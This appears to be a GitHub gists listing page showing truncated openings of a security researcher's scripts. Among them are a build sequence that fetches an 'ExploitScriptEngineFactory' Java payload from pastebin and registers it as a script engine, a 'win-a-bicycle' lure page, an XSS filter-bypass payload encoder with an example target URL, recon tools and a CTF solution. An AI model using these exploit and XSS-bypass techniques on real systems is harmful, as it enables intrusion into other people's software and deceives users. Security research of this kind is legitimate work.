This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python -e | |
import sys,os,glob,time | |
errors_count=0 | |
max_id=100011265576762 | |
debug=False | |
start=time.time() | |
def GetSecondsPassed(): | |
global start | |
end=time.time() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mkdir src | |
mkdir src/META-INF | |
mkdir src/META-INF/services | |
curl https://pastebin.com/raw/XbCvxXT6 -o src/ExploitScriptEngineFactory.java | |
echo 'ExploitScriptEngineFactory' > src/META-INF/services/javax.script.ScriptEngineFactory | |
docker run -it -v `pwd`:/code openjdk /bin/bash | |
cd /code | |
javac -source 1.8 -target 1.8 src/ExploitScriptEngineFactory.java |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html> | |
<meta name="referrer" content="unsafe-url"> | |
<body onload="f()"> | |
<a href="" id="h"> home </a><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/> | |
<div id="div1"> | |
</div> | |
</hr><p style="float:left;">Type</p> <p style="color:green;padding-left : 20px;float:left;" >win-a-bicycle</p> <p style="padding-left : 20px;float:left;">in the two boxes and click enter</p><br/><img src="http://tiny.cc/img3" /> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<!-- Author Yasser Gersy @yassergersy v 2 --> | |
<html> | |
<head> | |
<meta charset="utf-8"> | |
</head> | |
<script> | |
var last_message=''; | |
var rcvd_msg_count=-2; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
r=requests.get('http://php.net/manual/en/indexes.functions.php') | |
res="" | |
for p in r.text.encode('utf-8').split('<a href="'): | |
if p.startswith('function'): | |
z=(p.split('"')[0].split('function.')[1]).replace('-','_')[0:-4] | |
res=res+z+"\r" | |
open('php_fun_names.txt','w').write(res) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys,os,requests | |
print """ | |
____________________________________________________ | |
Dir listing finder | |
usage python dirlister.py domains_path list_path | |
requirements wfuzz , python-requests | |
_____________________________________________________ | |
""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python | |
import requests | |
try: | |
requests.packages.urllib3.disable_warnings() | |
except: | |
print 'Error' | |
print 'Hackerone programs loader' | |
print '--------------------------------------------------------' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def most_common(lst): | |
return max(set(lst), key=lst.count) | |
def stripme(d): | |
z='' | |
for c in d: | |
if c in '0123456789': | |
z=z+c | |
return z |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#CTF https://cybertalents.com/competitions/quals-uae-egy-national-cyber-security-ctf-2018/secret-box | |
#https://s3-eu-west-1.amazonaws.com/hubchallenges/Reverse/secretbox.zip | |
# | |
# | |
#The code takes the message | |
#reveres it | |
# msg bitwised with the length of image file name | |
#Each char at i postioton in the MSG is stored in the image at postition [0,i][3] | |
# | |
#python secretbox-sol.py secret.png |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#The main purpose is to bypass xss filters and execute multi lines payload | |
#write your payload to a file.txt | |
#run the script and pass the file as argument | |
# $python js2S.py file.txt | |
# copy the output and pass the output paylad to a javascript function document.write or eval ,, etc , | |
#for example , http://vuln2-xss.com/?name=document.write(__output__) | |
#if any character from the following is filtered , remove it. | |
import sys,os |
NewerOlder